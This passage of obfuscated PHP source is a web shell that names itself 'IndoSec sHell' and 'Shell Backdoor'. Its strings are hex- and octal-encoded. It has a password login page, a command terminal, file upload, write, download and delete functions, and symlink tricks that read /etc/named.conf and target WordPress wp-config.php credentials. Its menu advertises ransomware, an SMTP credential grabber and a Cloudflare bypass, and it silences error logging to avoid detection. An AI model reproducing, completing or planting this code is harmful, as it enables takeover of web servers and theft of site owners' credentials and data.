"\46\141\153\163\151\x3d\x72\141\156\163\157\155\x22\40\143\x6c\141\x73\x73\x3d\42\x66\151\164\x75\x72\x65\40\142\164\156\40\x62\164\x6e\55\167\141\162\x6e\151\156\x67\40\142\x74\x6e\x2d\163\x6d\42\x3e\74\151\x20\x63\x6c\141\x73\x73\75\x22\x66\x61\x62\40\x66\141\55\x6b\x65\x79\x63\144\x6e\42\x3e\74\57\151\x3e\x20\x52\x61\156\x73\157\155\x77\x61\x72\x65\x3c\57\141\x3e\xa\x9\11\x9\11\x9\x3c\141\x20\150\x72\x65\146\75\x22\77\144\x69\162\75" . $dir . "\x26\141\x6b\163\x69\75\x73\x6d\164\x70\x67\x72\141\142\42\40\143\154\x61\x73\x73\75\x22\x66\151\164\165\162\145\x20\142\x74\x6e\x20\x62\x74\x6e\55\x77\x61\x72\156\x69\156\147\x20\x62\164\x6e\55\x73\155\x22\76\x3c\x69\40\143\x6c\141\163\163\75\x22\146\x61\163\x20\146\141\x20\x66\141\x2d\145\x78\143\154\141\155\x61\164\151\x6f\x6e\x2d\143\x69\162\143\x6c\145\42\x3e\74\57\x69\x3e\x20\x53\x4d\x54\x50\40\107\162\x61\142\142\x65\x72\74\57\141\76\12\x9\11\11\11\x9\74\141\40\150\x72\x65\146\x3d\x22\x3f\144\151\x72\75" . $dir . "\46\141\x6b\x73\151\75\142\171\x70\141\163\143\146\42\40\x63\x6c\141\x73\163\75\x22\x66\x69\164\x75\x72\x65\40\x62\x74\156\40\x62\164\156\x2d\167\141\x72\x6e\151\156\147\x20\x62\164\156\55\163\x6d\x22\x3e\x3c\151\x20\143\154\141\163\163\75\x22\146\x61\x73\40\x66\x61\55\x63\x6c\157\x75\144\42\x3e\74\57\151\76\x20\x42\171\160\141\x73\x73\40\103\x6c\x6f\165\x64\40\x46\x6c\141\162\x65\74\x2f\x61\x3e\xa\x9\x9\x9\11\11\x3c\141\x20\x68\162\145\146\75\x22\77\141\142\x6f\x75\164\42\x20\x63\154\141\163\163\75\42\x66\151\x74\165\x72\145\x20\x62\164\156\40\x62\164\x6e\55\167\141\x72\x6e\x69\x6e\x67\40\x62\164\156\55\163\155\42\x3e\x3c\151\x20\x63\154\x61\x73\163\x3d\42\146\141\x20\x66\141\x2d\x69\156\146\157\x22\x3e\74\x2f\x69\76\40\x41\142\x6f\x75\x74\x20\x55\x73\x3c\57\x61\76\12\11\x9\11\11\11\74\141\x20\x68\162\145\146\75\x22\77\x6b\145\154\x75\141\x72\x22\40\143\x6c\x61\163\x73\75\x22\x66\x69\164\165\x72\145\x20\x62\x74\156\x20\142\x74\x6e\55\x77\141\162\x6e\x69\156\x67\x20\x62\x74\x6e\55\163\155\42\76\74\151\x20\143\154\141\x73\163\x3d\42\146\x61\40\x66\141\55\x73\x69\147\156\55\157\x75\164\42\x3e\74\57\151\76\x20\x6b\x65\x6c\165\x61\x72\x3c\57\x61\76\12\11\x9\x9\11\x3c\57\x64\151\166\x3e\12\11\x9\11\x3c\x2f\144\x69\166\76\xa\x9\x9\x9\74\144\151\x76\x20\143\x6c\141\163\163\x3d\x22\x72\x6f\167\x22\76\xa\11\11\11\x9\74\x64\x69\166\40\x63\154\141\x73\163\x3d\42\x63\x6f\x6c\x2d\x6d\x64\x2d\65\42\x3e\x3c\x62\162\57\76\xa\11\x9\11\x9\11\x3c\x68\65\x3e\74\x69\40\x63\154\x61\x73\163\75\42\146\x61\40\146\x61\x2d\164\x65\162\155\x69\156\x61\154\x22\x3e\x3c\x2f\x69\76\x54\x65\162\155\x69\x6e\141\154\x20\x3a\40\x3c\57\x68\65\x3e\xa\x9\x9\x9\x9\11\74\x66\157\162\155\x3e\xa\x9\11\x9\11\11\11\x3c\x69\156\160\x75\164\40\164\171\x70\145\75\x22\164\x65\170\164\42\40\x63\154\x61\x73\163\x3d\x22\x66\157\x72\155\x2d\x63\x6f\x6e\164\162\x6f\154\x22\40\x6e\x61\x6d\x65\x3d\42\x63\x6d\144\42\x20\x61\165\x74\x6f\143\x6f\x6d\x70\x6c\x65\164\145\75\42\x6f\x66\146\42\40\x70\154\x61\143\145\x68\157\x6c\144\145\x72\x3d\42\151\x64\x20\x7c\40\165\x6e\141\155\x65\x20\x2d\141\40\x7c\40\167\150\157\x61\155\x69\x20\174\40\150\145\x6b\145\144\42\76\12\11\11\11\x9\x9\x3c\x2f\146\x6f\x72\155\76\xa\x9\x9\x9\11\x9\x3c\x68\x72\x20\x73\x74\x79\x6c\145\75\x22\142\x61\x63\153\147\x72\x6f\x75\144\72\x20\x77\x68\151\x74\145\x22\x2f\x3e\12\11\x9\x9\x9\x9\x3c\x68\x35\x3e\x3c\x69\x20\x63\154\x61\x73\163\x3d\42\146\x61\40\146\x61\x2d\163\145\141\x72\x63\150\42\x3e\74\x2f\151\x3e\40\x49\x6e\x66\157\x72\155\141\163\151\40\x3a\x20\74\x2f\150\65\x3e\xa\x9\x9\x9\11\11\74\144\x69\x76\x20\x63\154\x61\x73\x73\x3d\x22\x63\x61\x72\x64\40\164\x61\142\x6c\x65\55\162\x65\163\160\x6f\156\163\x69\x76\x65\42\76\12\x9\11\x9\11\11\11\x3c\144\151\x76\40\x63\154\x61\163\163\75\x22\x63\141\162\x64\55\142\x6f\x64\171\x22\x3e\xa\x9\x9\x9\11\11\x9\x9\x3c\x74\x61\x62\154\x65\40\143\154\141\x73\x73\75\x22\164\x61\x62\x6c\x65\42\x20\x73\x74\x79\x6c\x65\x3d\x22\x63\157\154\x6f\162\x3a\x20\x23\63\63\x33\x22\76\12\x9\x9\11\11\11\11\11\x9\x3c\x74\162\76\xa\11\11\11\11\11\x9\x9\x9\x9\x3c\x74\144\x3e\x50\x48\x50\74\57\164\x64\76\xa\11\x9\x9\x9\11\11\x9\11\11\x3c\164\x64\x3e\x20\72\40" . $ver . "\74\x2f\164\x64\76\xa\11\x9\11\11\11\x9\x9\x9\x3c\57\164\162\x3e\xa\11\x9\11\x9\11\x9\11\11\74\x74\x72\x3e\12\11\11\11\11\11\x9\11\11\11\74\x74\x64\76\x49\120\40\x53\x65\x72\x76\145\x72\x3c\x2f\164\144\76\xa\x9\x9\11\11\x9\11\x9\x9\x9\x3c\164\144\76\x20\72\x20" . $ip . "\x3c\x2f\x74\144\76\12\11\11\11\x9\x9\11\11\11\74\x2f\x74\162\x3e\xa\11\11\11\11\x9\11\11\11\74\164\162\76\xa\x9\x9\11\x9\x9\11\x9\11\x9\x3c\x74\x64\76\110\104\x44\x3c\x2f\x74\x64\76\12\x9\x9\x9\x9\x9\x9\11\11\x9\74\x74\x64\x20\x63\x6c\141\163\x73\x3d\42\144\55\146\154\x65\170\x22\x3e\124\x6f\x74\x61\x6c\40\x3a\40" . formatSize($total) . "\40\x46\x72\x65\145\40\x3a\x20" . formatSize($free) . "\40\x5b" . $pers . "\45\135\74\x2f\164\144\76\12\11\x9\x9\11\11\x9\11\x9\x3c\57\x74\162\x3e\xa\x9\11\x9\x9\11\x9\11\x9\x3c\164\x72\76\12\11\11\11\11\11\x9\11\11\x9\74\x74\144\76\104\x6f\x6d\141\151\156\x3c\57\164\x64\76\xa\11\11\x9\11\11\11\x9\x9\x9\74\164\x64\x3e\x3a\x20" . $dom . '' . $die . "\74\x2f\164\144\76\xa\11\11\x9\11\11\11\x9\11\74\x2f\x74\162\76\xa\11\11\x9\x9\11\11\x9\11\74\x74\162\x3e\xa\11\11\x9\x9\x9\x9\11\11\11\x3c\164\x64\x3e\x4d\171\123\121\x4c\74\57\164\144\76\xa\11\x9\11\x9\11\x9\x9\11\x9\x3c\164\x64\x3e\72\40" . $mysql . "\74\x2f\x74\x64\x3e\12\11\x9\11\11\x9\11\x9\x9\74\x2f\x74\162\76\xa\11\11\11\x9\11\11\x9\x9\74\164\x72\76\xa\x9\11\11\11\x9\x9\x9\x9\11\74\164\x64\x3e\x63\125\x52\x4c\74\57\164\144\x3e\xa\11\11\11\x9\x9\x9\11\11\11\x3c\164\x64\x3e\72\x20" . $curl . "\x3c\x2f\164\x64\x3e\12\x9\11\11\11\x9\x9\11\x9\74\x2f\164\162\x3e\xa\11\11\x9\11\x9\11\11\11\74\164\x72\x3e\12\11\x9\11\11\11\11\x9\x9\11\74\x74\x64\x3e\123\x6f\146\164\167\141\162\x65\74\x2f\x74\x64\x3e\12\x9\x9\11\11\11\x9\11\11\x9\x3c\164\x64\76\72\40" . $sof . "\x3c\57\164\x64\x3e\12\x9\11\x9\11\11\11\x9\11\74\x2f\x74\162\x3e\12\11\11\11\x9\11\11\11\11\x3c\164\162\x3e\12\11\x9\x9\11\11\x9\x9\x9\x9\x3c\x74\144\x3e\x53\x69\163\x74\145\x6d\x20\117\160\145\162\141\x73\151\74\x2f\x74\x64\76\xa\11\11\x9\11\x9\11\11\11\x9\74\x74\x64\x3e\x20\72\x20" . $os . "\74\57\164\144\x3e\xa\11\x9\x9\11\x9\x9\11\x9\74\x2f\164\162\76\xa\x9\11\x9\x9\x9\x9\x9\74\57\x74\x61\x62\154\145\76\12\11\11\11\x9\x9\x9\74\57\144\151\166\x3e\12\x9\x9\11\x9\11\74\x2f\144\x69\x76\x3e\x3c\150\162\57\x3e\12\11\11\x9\x9\x3c\57\144\x69\166\76\xa\x9\x9\11\x3c\144\151\166\x20\143\154\141\x73\x73\x3d\x22\143\157\154\x2d\x6d\144\55\67\x20\x6d\164\55\x34\42\x3e"; goto PMQDe; pbQJd: $mysql = function_exists("\x6d\x79\163\x71\154\x5f\x63\157\156\x6e\145\x63\164") ? "\74\146\x6f\156\x74\x20\x63\x6f\154\157\x72\75\x67\162\145\145\156\76\x4f\116\x3c\x2f\x66\157\x6e\164\x3e" : "\74\146\157\156\x74\x20\143\x6f\x6c\x6f\162\x3d\162\x65\144\76\117\106\106\74\57\146\x6f\x6e\164\x3e"; goto teBsd; PMQDe: if (isset($_GET["\153\x65\x6c\x75\x61\162"])) { session_start(); session_destroy(); echo "\x3c\163\x63\162\151\160\x74\76\167\x69\x6e\144\157\x77\x2e\x6c\x6f\143\141\164\x69\x6f\156\75\42\77\x22\x3b\74\x2f\163\143\162\x69\160\164\76"; } goto bVW_6; Ok3YC: if (isset($_GET["\146\151\x6c\x65"])) { $file = $_GET["\x66\151\154\x65"]; } goto OS6X6; PJRU9: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\142"; } elseif (($perms & 16384) == 16384) { $info = "\144"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\160"; } else { $info = "\165"; } $info .= $perms & 256 ? "\x72" : "\55"; $info .= $perms & 128 ? "\x77" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\170" : ($perms & 2048 ? "\123" : "\55"); $info .= $perms & 32 ? "\162" : "\55"; $info .= $perms & 16 ? "\167" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\123" : "\55"); $info .= $perms & 4 ? "\x72" : "\x2d"; $info .= $perms & 2 ? "\x77" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\x54" : "\55"); return $info; } goto CTlYv; xn6PP: foreach ($scandir as $dir) { if (strlen($dir) > 18) { $_dir = substr($dir, 0, 18) . "\x2e\56\56"; } else { $_dir = $dir; } $_diir = $_dir; if (!is_dir($path . "\x2f" . $dir) || $dir == "\56" || $dir == "\56\x2e") { continue; } echo "\74\164\162\x3e\xa\x9\x9\x9\x9\11\74\164\144\40\x63\x6c\141\163\163\75\x22\x74\145\170\164\x2d\x77\150\151\164\145\x22\76\x3c\x69\x6d\147\40\x73\x72\x63\75\x22\150\x74\x74\x70\72\57\57\141\x75\x78\x2e\151\x63\x6f\x6e\163\x70\x61\x6c\x61\x63\x65\x2e\x63\x6f\155\x2f\x75\x70\154\x6f\x61\x64\163\x2f\146\157\154\x64\145\x72\x2d\151\143\157\156\55\62\65\x36\x2d\61\67\70\x37\x36\67\x32\x34\70\x32\56\x70\x6e\147\x22\x20\143\x6c\x61\163\x73\75\x22\151\143\x6f\x22\x3e\74\57\x69\x6d\x67\x3e\40\x3c\141\x20\x68\x72\x65\x66\x3d\x22\x3f\144\x69\x72\x3d" . $path . "\x2f" . $dir . "\42\76" . $_diir . "\74\x2f\141\76\74\x2f\x74\x64\76\xa\x9\x9\x9\11\x9\x3c\x74\x64\40\x63\x6c\x61\163\163\x3d\x22\x74\x65\x78\x74\x2d\x77\x68\x69\164\145\x20\x74\145\x78\x74\x2d\143\145\x6e\164\x65\162\42\76"; echo "\55\x2d"; echo "\x3c\57\164\x64\x3e\12\11\11\x9\x9\11\74\164\144\x20\x63\x6c\x61\163\163\x3d\x22\164\145\x78\164\55\143\145\x6e\x74\145\x72\x22\x3e\12\x9\x9\11\11\11\74\141\40\x68\162\145\146\x3d\x22\x3f\x64\x69\162\x3d" . $path . "\57" . $dir . "\46\141\x6b\x73\x69\x3d\x63\150\x6d\157\144\x5f\144\x69\162\x22\76\xa"; if (is_writable($path . "\57" . $dir)) { echo "\x3c\x66\157\156\164\x20\x63\157\154\x6f\162\75\42\x23\60\x30\146\x66\x30\60\x22\x3e"; } elseif (!is_readable($path . "\57" . $dir)) { echo "\x3c\x66\x6f\156\164\x20\x63\157\x6c\157\162\x3d\42\162\145\x64\42\x3e"; } echo perms($path . "\x2f" . $dir); if (is_writable($path . "\57" . $dir) || !is_readable($path . "\57" . $dir)) { echo "\x3c\x2f\x66\157\x6e\x74\76\74\57\x61\76\74\57\164\x64\x3e\12\11\11\x9\x9\x9\x3c\164\144\x20\143\x6c\141\163\x73\x3d\x22\x22\x3e\x3c\x63\145\156\x74\145\x72\x3e\74\x61\40\x74\151\164\154\x65\x3d\x22\x52\145\156\x61\x6d\x65\x22\x20\x63\x6c\141\163\163\x3d\42\142\x61\x64\147\x65\40\142\141\144\147\145\x2d\x73\x75\x63\x63\x65\x73\163\42\40\x68\x72\x65\146\75\x22\x3f\144\151\x72\x3d" . $path . "\x2f" . $dir . "\46\141\153\x73\x69\75\162\145\156\x61\155\x65\x5f\x66\x6f\x6c\144\x65\x72\42\x3e\46\x6e\142\x73\x70\73\x3c\x69\40\x63\154\x61\x73\163\x3d\42\146\141\163\x20\x66\141\55\x70\x65\x6e\x22\76\74\x2f\151\x3e\x26\156\142\163\160\73\x3c\x2f\x61\76\x26\x6e\x62\x73\x70\73\46\156\x62\x73\x70\73\x3c\x61\40\164\151\164\154\145\x3d\42\x44\145\x6c\x65\x74\145\42\x20\x63\x6c\x61\163\x73\75\42\x62\x61\144\147\x65\40\142\x61\x64\x67\x65\x2d\x64\x61\x6e\x67\x65\162\x22\40\150\162\x65\146\x3d\x22\x3f\x64\x69\x72\75" . $path . "\x2f" . $dir . "\46\141\x6b\163\x69\x3d\150\x61\x70\165\x73\137\x66\x6f\x6c\x64\x65\162\x22\76\46\x6e\x62\x73\160\73\x3c\151\40\x63\x6c\x61\163\163\x3d\x22\x66\x61\40\x66\141\55\x74\x72\x61\163\x68\42\x3e\x3c\57\151\x3e\x26\156\x62\163\160\x3b\74\57\141\x3e\12\11\11\11\x9\x9\x3c\57\164\x64\x3e"; } } goto n0tKq; c53nV: @ini_set("\154\x6f\x67\137\x65\x72\162\157\x72\163", 0); goto ny8eb; OS6X6: if ($_GET["\x61\x6b\163\151"] == "\x62\x75\141\164\137\146\x69\x6c\x65") { echo "\xa\11\x9\x9\74\x68\64\x3e\xa\11\x9\x9\x9\x3c\151\155\147\40\163\162\143\75\47\150\164\164\160\x3a\57\x2f\151\x63\x6f\x6e\x73\56\151\x63\157\156\141\162\143\150\151\166\x65\56\143\157\155\57\x69\143\x6f\156\x73\57\x7a\150\x6f\x6f\154\x65\147\x6f\x2f\155\141\x74\145\x72\x69\141\x6c\57\x32\x35\x36\x2f\x46\151\x6c\145\164\171\x70\145\55\104\x6f\143\163\x2d\x69\143\157\x6e\56\160\x6e\147\x27\40\143\154\x61\163\x73\75\x27\151\x63\x6f\x32\x27\x3e\74\x2f\151\155\x67\76\40\x42\165\x61\164\x20\x46\151\154\145\x3a\40\12\11\x9\11\74\x2f\x68\64\x3e\xa\x9\11\11\x3c\146\157\162\155\x20\x6d\x65\164\150\x6f\144\x3d\47\120\x4f\123\x54\x27\76\xa\x9\x9\x9\x9\x3c\151\x6e\x70\x75\164\40\164\x79\x70\145\75\x27\164\x65\170\x74\x27\x20\143\x6c\x61\163\163\x3d\47\x66\157\162\155\x2d\143\157\156\164\x72\x6f\x6c\47\40\x6e\x61\155\145\75\47\x6e\141\155\141\x5f\x66\x69\154\145\x27\40\141\x75\164\157\143\x6f\x6d\x70\154\x65\x74\145\75\47\157\x66\x66\x27\40\x70\x6c\141\143\x65\x68\x6f\x6c\144\x65\162\75\x27\x4e\x61\155\x61\40\106\x69\154\x65\56\56\56\x27\76\74\x62\162\57\x3e\12\11\11\x9\11\74\x74\x65\170\164\141\x72\145\141\40\x6e\141\155\145\75\47\151\163\x69\137\146\x69\154\x65\x27\40\143\x6c\x61\x73\163\75\47\x66\x6f\162\x6d\x2d\143\157\x6e\x74\162\157\x6c\x27\x20\x72\x6f\167\163\75\x27\70\x27\40\160\154\141\143\145\150\x6f\x6c\x64\x65\x72\75\47\111\163\x69\40\x46\x69\154\145\56\x2e\x2e\47\x3e\x3c\57\x74\x65\x78\164\x61\162\145\x61\76\74\x62\x72\57\x3e\12\11\x9\11\11\x3c\142\165\x74\164\x6f\x6e\40\164\x79\x70\x65\x3d\47\163\x75\155\142\151\164\x27\40\143\x6c\x61\x73\163\75\x27\x62\164\156\40\142\164\x6e\x2d\151\156\x66\x6f\x20\142\164\x6e\x2d\x62\154\157\143\x6b\x27\x20\156\141\x6d\x65\75\47\142\151\153\x69\x6e\47\x3e\102\151\153\151\x6e\x21\x21\x3c\57\142\165\164\x74\157\156\x3e\12\x9\11\11\x3c\57\146\x6f\x72\x6d\76"; if (isset($_POST["\142\x69\x6b\x69\156"])) { $nama_file = $_POST["\156\x61\x6d\x61\x5f\146\151\154\x65"]; $isi_file = $_POST["\151\163\x69\137\x66\x69\154\x65"]; $handle = fopen("{$nama_file}", "\167"); if (fwrite($handle, $isi_file)) { echo "\x3c\163\143\x72\151\x70\x74\76\167\x69\x6e\x64\157\x77\x2e\154\x6f\143\141\164\151\x6f\156\75\x22\77\144\151\x72\75" . $dir . "\42\x3b\40\141\154\145\162\x74\x28\42\x42\165\141\164\40\x46\x69\x6c\145\40\x42\x65\162\x68\x61\x73\x69\154\42\51\x3b\x3c\57\163\x63\x72\x69\x70\164\76"; } else { echo "\x3c\x73\143\162\x69\x70\x74\x3e\141\x6c\x65\162\x74\50\x22\x46\x69\154\145\x20\x47\141\147\x61\x6c\40\104\x69\x62\x75\x61\164\42\x29\x3b\74\57\163\143\162\151\160\x74\x3e"; } } } goto B7fRz; jAcCG: $default_charset = "\x55\x54\106\x2d\70"; goto rBdID; LB30f: session_start(); goto u7SA4; XhlRY: @ini_set("\x6f\x75\x74\160\165\x74\x5f\x62\x75\x66\x66\145\162\151\x6e\147", 0); goto teeib; ob6mM: $total = disk_total_space($path); goto vGSQa; vPQRS: if (isset($_GET["\x66\151\154\145"]) && $_GET["\x66\151\x6c\145"] != '' && $_GET["\141\x6b\x73\151"] == "\x64\x6f\x77\156\x6c\x6f\x61\x64") { @ob_clean(); $file = $_GET["\x66\x69\154\145"]; header("\x43\157\x6e\164\x65\x6e\x74\x2d\104\x65\163\143\x72\151\x70\x74\x69\x6f\156\72\40\106\151\x6c\145\x20\x54\x72\x61\156\163\146\x65\162"); header("\103\x6f\156\x74\x65\x6e\x74\55\x54\x79\160\145\72\40\141\160\x70\x6c\x69\x63\141\164\151\x6f\156\57\x6f\x63\x74\x65\164\x2d\163\x74\162\145\141\155"); header("\103\x6f\156\164\x65\x6e\x74\x2d\104\x69\163\x70\x6f\x73\151\164\151\157\x6e\x3a\40\141\x74\164\141\x63\150\x6d\x65\156\164\x3b\40\x66\151\154\145\x6e\141\155\x65\75\x22" . basename($file) . "\42"); header("\105\x78\160\151\162\x65\x73\x3a\x20\x30"); header("\x43\x61\143\x68\x65\x2d\x43\x6f\156\x74\x72\157\154\72\40\155\165\x73\x74\55\162\145\166\141\x6c\151\x64\x61\x74\145"); header("\x50\162\141\x67\155\141\72\x20\x70\165\142\154\151\x63"); header("\103\157\156\164\145\x6e\164\55\x4c\x65\156\x67\x74\150\x3a\x20" . filesize($file)); readfile($file); die; } goto s0lZA; rqHo2: if (isset($_GET["\x61\142\x6f\165\164"])) { echo "\74\144\151\x76\40\143\154\x61\163\x73\x3d\x22\143\141\x72\144\40\164\145\170\164\x2d\143\145\x6e\164\x65\x72\x20\142\x67\55\154\x69\147\150\164\40\x61\142\x6f\x75\164\x22\76\12\11\11\x9\11\x3c\150\x34\x20\143\x6c\141\163\x73\75\x22\x63\x61\162\x64\55\150\145\141\x64\145\x72\42\76\x7b\40\111\x6e\144\157\123\145\143\x20\x7d\x3c\57\150\x34\76\xa\x9\11\11\11\74\x64\x69\166\40\x63\x6c\141\x73\x73\75\x22\143\x61\162\x64\x2d\142\157\x64\171\x22\76\12\x9\11\x9\11\11\x3c\143\145\156\x74\x65\162\x3e\x3c\144\151\166\40\x63\x6c\x61\x73\x73\x3d\x22\151\x6d\147\x22\x3e\x3c\57\144\151\x76\x3e\74\57\143\145\156\x74\x65\162\x3e\xa\11\x9\x9\x9\11\x3c\160\40\x63\154\141\163\x73\x3d\42\143\141\162\144\55\164\145\170\164\x22\x3e\173\40\x49\x6e\144\x6f\123\x65\143\x20\x7d\40\x41\144\141\x6c\x61\150\40\123\x65\142\x75\141\x68\x20\x4b\157\x6d\165\156\151\164\x61\163\40\131\141\156\147\40\102\x65\x72\x66\x6f\x6b\165\x73\40\113\145\x70\x61\x64\x61\40\124\x65\x6b\156\x6f\x6c\x6f\147\x69\40\x44\x69\40\111\156\144\x6f\156\x65\163\151\141\54\40\x44\x61\162\x69\40\x4d\x65\155\x62\165\141\x74\x20\115\145\156\x67\141\x6d\x61\x6e\153\141\156\x20\x44\x61\x6e\40\115\145\156\147\x65\170\160\x6c\x6f\x69\x74\x61\163\151\x20\123\145\142\165\x61\x68\40\123\151\x73\164\145\x6d\56\74\57\160\x3e\12\11\11\11\11\74\x2f\x64\151\x76\x3e\xa\x9\x9\x9\x9\x3c\144\x69\166\x20\143\154\x61\163\x73\x3d\42\143\141\x72\144\55\146\157\x6f\164\x65\x72\42\x3e\12\11\x9\11\x9\x9\74\160\x20\143\x6c\x61\163\x73\x3d\42\x63\141\162\x64\x2d\x74\145\170\x74\x22\x3e\74\163\x6d\141\154\154\40\x63\154\x61\x73\163\75\x22\x74\x65\x78\x74\x2d\155\x75\x74\x65\x64\x22\x3e\103\x6f\x70\x79\x72\151\147\x68\164\40\62\60\x31\71\40\x7b\x20\x49\x6e\144\157\123\x65\143\40\175\x3c\x2f\163\155\x61\154\154\76\74\x2f\160\x3e\xa\11\11\11\11\x3c\x2f\x64\151\x76\x3e\xa\x9\x9\x9\x3c\x2f\144\x69\x76\x3e\x3c\x62\162\57\x3e"; die; } goto xQnAH; teeib: @ini_set("\x64\151\x73\160\x6c\x61\x79\137\x65\162\x72\x6f\162\163", 0); goto OSshl; fl2dV: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\x61\x20\150\162\x65\146\x3d\42\77\144\151\162\75\x2f\x22\76\57\74\57\141\x3e"; continue; } if ($pat == '') { continue; } echo "\74\x61\x20\150\x72\x65\146\75\42\x3f\144\x69\162\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\42\76" . $pat . "\74\x2f\141\x3e\x2f"; } goto WWyxv; oAS2R: set_time_limit(0); goto vk5Bh; OSshl: $aupas = "\x34\x35\x33\x66\65\x38\144\x65\71\x62\x35\64\71\x62\70\141\141\141\65\x33\144\142\x37\143\64\71\143\x38\x63\x33\x63\70"; goto sUlgs; WWyxv: $scandir = scandir($path); goto KPY1y; gUTTf: echo "\120\x61\x74\x68\x20\72\40"; goto fl2dV; QpB05: if ($_GET["\x61\x6b\x73\x69"] == "\x73\x79\x6d\162\x65\141\144") { echo "\x72\145\141\144\40\x2f\x65\164\x63\57\x6e\x61\x6d\145\x64\56\143\x6f\x6e\x66"; echo "\74\146\157\162\x6d\x20\155\145\164\x68\157\x64\x3d\47\160\157\x73\164\47\x20\141\143\x74\151\x6f\x6e\x3d\x27\x3f\x64\151\162\75{$dir}\x26\141\153\x73\x69\75\163\x79\155\162\x65\x61\x64\46\x73\x61\x76\x65\75\x31\47\x3e\xa\x9\x9\11\x3c\164\145\x78\164\x61\162\x65\x61\40\143\154\141\163\163\x3d\x27\146\x6f\162\155\x2d\x63\x6f\x6e\164\162\157\x6c\47\x20\x72\157\167\x73\75\x27\x38\x27\40\156\141\155\145\x3d\47\146\151\154\x65\x27\76"; flush(); flush(); $file = "\57\x65\x74\x63\57\156\x61\x6d\x65\x64\56\143\157\156\146"; $r3ad = @fopen($file, "\162"); if ($r3ad) { $content = @fread($r3ad, @filesize($file)); echo '' . htmlentities($content) . ''; } else { if (!$r3ad) { $r3ad = @show_source($file); } else { if (!$r3ad) { $r3ad = @highlight_file($file); } else { if (!$r3ad) { $sm = @symlink($file, "\163\x79\x6d\56\x74\x78\x74"); if ($sm) { $r3ad = @fopen("\x73\x79\155\57\163\x79\155\x2e\164\x78\x74", "\162"); $content = @fread($r3ad, @filesize($file)); echo '' . htmlentities($content) . ''; } } } } } echo "\x3c\57\164\145\x78\x74\141\162\145\x61\x3e\74\142\x72\x2f\x3e\x3c\151\156\160\x75\x74\x20\x74\x79\x70\145\75\47\163\165\x62\155\x69\164\x27\x20\143\x6c\141\163\163\x3d\47\142\164\156\x20\x62\x74\156\x2d\144\x61\156\x67\145\162\x20\146\x6f\x72\x6d\55\x63\157\156\x74\162\157\154\47\x20\x76\x61\x6c\x75\x65\75\47\123\141\166\x65\x27\x2f\76\x20\74\x2f\x66\157\x72\x6d\76"; if (isset($_GET["\x73\x61\x76\145"])) { $cont = stripcslashes($_POST["\146\151\154\x65"]); $f = fopen("\x6e\x61\x6d\145\144\x2e\164\x78\164", "\167"); $w = fwrite($f, $cont); if ($w) { echo "\x3c\x62\x72\57\76\x73\141\x76\x65\40\x68\x61\163\x20\x62\x65\145\156\x20\x73\x75\x63\143\x65\163\x73\146\x75\154\154\x79"; } fclose($f); } die; } goto DSqrx; h2GTS: $path = str_replace("\x5c", "\57", $path); goto VE56d; rBdID: function login_shell() { ?>
<!doctypehtml><html><head><meta content="widht=device-widht,initial-scale=1"name="viewport"><meta content="Holiq"name="author"><meta content="{ IndoSec }"name="copyright"><title>{ IndoSec sHell }</title><link href="https://www.indsc.me/images/logo.png"rel="icon"type="image/png"><link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"rel="stylesheet"><link href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"rel="stylesheet"></head><body class="text-center bg-dark text-light"><div class="container mt-5"><div class="form-group"><h1 class="text-center">{ INDOSEC }</h1><h5 class="text-center pb-5">Shell Backdoor</h5><form method="post"><input class="form-control"type="password"name="pass"placeholder="USER ID"><br><input class="btn btn-block btn-danger"class="form-control"type="submit"value="Login"></form></div></div><a class="fixed-bottom mb-3 text-muted"href="https://facebook.com/IndoSecOfficial">Copyright 2019 @ { IndoSec }</a></body></html><?php  die; } goto zyt1z; s0lZA: function w($dir, $perm) { if (!is_writable($dir)) { return "\74\x66\x6f\156\164\40\x63\x6f\x6c\157\x72\75\x72\x65\x64\76" . $perm . "\x3c\x2f\x66\157\156\164\x3e"; } else { return "\74\x66\157\156\164\x20\143\157\x6c\157\162\75\154\151\155\x65\x3e" . $perm . "\74\x2f\x66\x6f\x6e\x74\76"; } } goto rqWOj; VY1ts: @ini_set("\145\x72\x72\157\162\x5f\x6c\157\147", NULL); goto c53nV; DSqrx: if ($_GET["\141\x6b\x73\x69"] == "\x73\171\155\x5f\64\60\x34") { echo "\74\x68\62\x3e\x53\171\155\154\x69\x6e\x6b\x20\64\60\x34\74\57\x68\62\x3e\12\x9\x9\74\146\157\162\x6d\x20\155\145\164\150\x6f\144\x3d\x22\x70\157\163\x74\42\x3e\12\11\11\11\x46\151\x6c\145\40\124\x61\x72\x67\145\164\72\x20\x3c\x69\x6e\160\165\164\x20\164\171\160\145\x3d\42\164\145\170\x74\42\x20\x63\154\141\x73\x73\x3d\42\146\x6f\x72\155\55\x63\x6f\156\164\x72\157\x6c\x22\40\x6e\x61\x6d\x65\x3d\x22\144\151\x72\42\x20\x76\141\x6c\x75\145\75\x22\57\x68\157\x6d\145\x2f\165\x73\145\162\57\x70\165\142\x6c\x69\143\x5f\150\x74\x6d\154\x2f\x77\160\x2d\x63\157\156\x66\x69\x67\x2e\160\x68\x70\x22\76\74\142\162\x3e\xa\x9\x9\11\x53\141\x76\x65\x20\101\163\72\x20\x3c\x69\156\160\165\x74\40\x74\x79\x70\x65\75\x22\164\145\x78\x74\x22\40\x63\x6c\141\163\x73\x3d\42\x66\157\x72\155\55\143\157\156\164\x72\x6f\x6c\42\x20\156\x61\x6d\145\x3d\42\x69\x73\151\x22\x20\x70\x6c\x61\143\x65\150\x6f\x6c\144\145\162\75\x22\x5b\x45\170\x5d\40\x66\151\154\145\56\x74\x78\164\x22\57\x3e\74\x62\x72\x2f\x3e\12\x9\11\x9\74\151\156\160\165\x74\40\x74\171\160\x65\x3d\x22\163\x75\x62\155\x69\x74\x22\x20\x63\x6c\x61\x